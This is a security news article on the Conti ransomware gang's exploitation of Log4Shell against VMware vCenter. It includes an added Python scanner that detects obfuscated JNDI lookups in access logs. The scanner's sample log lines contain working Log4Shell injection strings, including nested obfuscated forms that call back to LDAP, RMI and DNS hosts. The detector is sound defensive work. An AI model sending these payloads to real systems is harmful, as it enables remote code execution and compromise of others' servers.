The Conti ransomware group is exploiting the critical Log4Shell vulnerability. The gang has used the flaw to reach internal VMware vCenter Server instances and encrypt the virtual machines they manage. Conti is also the first established ransomware operation known to have weaponized Log4Shell as part of a full intrusion chain; the earlier abuse came from opportunistic cryptocurrency miners, botnets and the novel Khonsari strain.
A proof-of-concept (PoC) exploit for CVE-2021-44228, a critical remote code execution flaw in the Apache Log4j 2 logging library better known as Log4Shell (it is sometimes misreported as "LogJam", the name of an unrelated 2015 TLS vulnerability), emerged on December 9. It triggered mass scanning of the internet by multiple actors looking for vulnerable systems. The first to abuse the flaw were cryptocurrency miners, botnets, and Khonsari, a novel ransomware strain.
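The scanning wave mentioned above left its traces in web server access logs, but within a day the scanners had moved from the plain `${jndi:ldap://...}` string to nested Log4j lookups that defeat naive grep rules. The following is an added example, not code from the article, AdvIntel or VMware: it normalizes the obfuscation forms Log4j itself resolves (`${key:-default}`, `${lower:...}`, `${upper:...}`) and then looks for the JNDI lookup, over a set of constructed access-log lines using documentation IP ranges. The normalization mirrors Log4j's StrSubstitutor behaviour for those lookup types only; anything it cannot resolve is left literal.

```python
"""Detect Log4Shell (CVE-2021-44228) exploitation attempts in access logs,
including the nested-lookup obfuscation seen during the December 2021
mass scanning. Added example; not code from the article or its sources."""
from __future__ import annotations

import re
from dataclasses import dataclass

# An innermost Log4j lookup: "${...}" with no further "${" inside it.
_INNER = re.compile(r"\$\{([^${}]*)\}")
# The dangerous lookup once obfuscation is peeled away. Log4j lower-cases the
# lookup prefix before dispatch, so "JnDi" is as effective as "jndi".
_JNDI = re.compile(r"\$\{jndi:(?P<scheme>[a-z0-9+.-]+)://(?P<host>[^/}\s]+)", re.I)


def _resolve_one(body: str) -> str | None:
    """Resolve one innermost lookup the way Log4j would for the lookup types
    attackers abuse for obfuscation. Returns None to keep the text literal."""
    if ":-" in body:                      # "${key:-default}" -> default
        return body.split(":-", 1)[1]     # "${::-j}" and "${env:X:-j}" -> "j"
    prefix, sep, rest = body.partition(":")
    if not sep:
        return None                       # "${amount}" style template text
    prefix = prefix.lower()
    if prefix == "lower":
        return rest.lower()
    if prefix == "upper":
        return rest.upper()
    return None                           # jndi:, date:, unknown -> keep as is


def normalize(text: str, max_rounds: int = 32) -> str:
    """Peel nested lookups from the inside out until nothing changes."""
    for _ in range(max_rounds):
        changed = False

        def repl(m: re.Match) -> str:
            nonlocal changed
            resolved = _resolve_one(m.group(1))
            if resolved is None:
                return m.group(0)
            changed = True
            return resolved

        text = _INNER.sub(repl, text)
        if not changed:
            break
    return text


@dataclass
class Finding:
    line_no: int
    scheme: str      # ldap, rmi, dns, ... (the JNDI provider being requested)
    host: str        # attacker-controlled callback host[:port]
    normalized: str  # the log line after de-obfuscation, for the analyst


def scan_log(lines) -> list[Finding]:
    """Return one Finding per log line carrying a JNDI lookup attempt."""
    findings = []
    for line_no, line in enumerate(lines, 1):
        if "${" not in line:              # cheap pre-filter for the common case
            continue
        norm = normalize(line)
        m = _JNDI.search(norm)
        if m:
            findings.append(Finding(line_no, m["scheme"].lower(), m["host"], norm))
    return findings


# Constructed sample: combined-format access log lines, not real traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Dec/2021:03:14:15 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Dec/2021:03:14:16 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.5:1389/a}"',
    '198.51.100.8 - - [10/Dec/2021:03:14:17 +0000] "GET /?x=${${lower:j}ndi:${lower:l}dap://203.0.113.5:1389/b} HTTP/1.1" 400 0 "-" "-"',
    '198.51.100.9 - - [10/Dec/2021:03:14:18 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-r}mi://203.0.113.6:1099/c}"',
    '198.51.100.10 - - [10/Dec/2021:03:14:19 +0000] "GET / HTTP/1.1" 200 512 "-" "${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-d}ns://203.0.113.7/d}"',
    '198.51.100.11 - - [10/Dec/2021:03:14:20 +0000] "GET /?price=${amount} HTTP/1.1" 200 512 "-" "curl/7.79"',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f.line_no}: {f.scheme} callback to {f.host}")
```

A hit in the access log only proves an attempt; whether the payload reached a vulnerable Log4j instance shows up as an outbound LDAP, RMI or DNS connection from the Java process to the callback host, so correlate these findings with egress or DNS logs before treating a host as compromised.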
By December 15, the list of malicious actors abusing Log4Shell had grown significantly, and many of them were state-backed hackers. It also came to light that the Conti ransomware gang had been evaluating Log4Shell as a possible attack route as early as December 12.
Advanced Intelligence (AdvIntel), a cybercrime and adversarial disruption firm, revealed that the group began hunting for new targets once it had a working Log4Shell exploit. Its goal was to use the flaw against VMware vCenter servers to move laterally within networks it was already operating in.
Dozens of vendors have been affected by Log4Shell and have rushed to patch their products. VMware is among the hardest hit, with around 40 of its products listed as affected. The company has published workarounds and fixes for many of them, but at the time of writing patches for some affected versions were still pending. Because the flaw allows unauthenticated remote code execution, any affected instance reachable from the public internet is at risk of full compromise, not merely of information disclosure.
“A malicious actor with network access to an impacted VMware product may exploit this issue to gain full control of the target system and/or perform a denial-of-service attack. Exploitation attempts in the wild have been confirmed by VMware,” said VMware. A supplemental blog post and frequently asked questions list was created for additional clarification. Please see: https://via.vmw.com/vmsa-2021-0028-faq
According to AdvIntel, Conti members have explicitly expressed interest in using Log4Shell in their operations, which matches the vCenter activity the firm observed.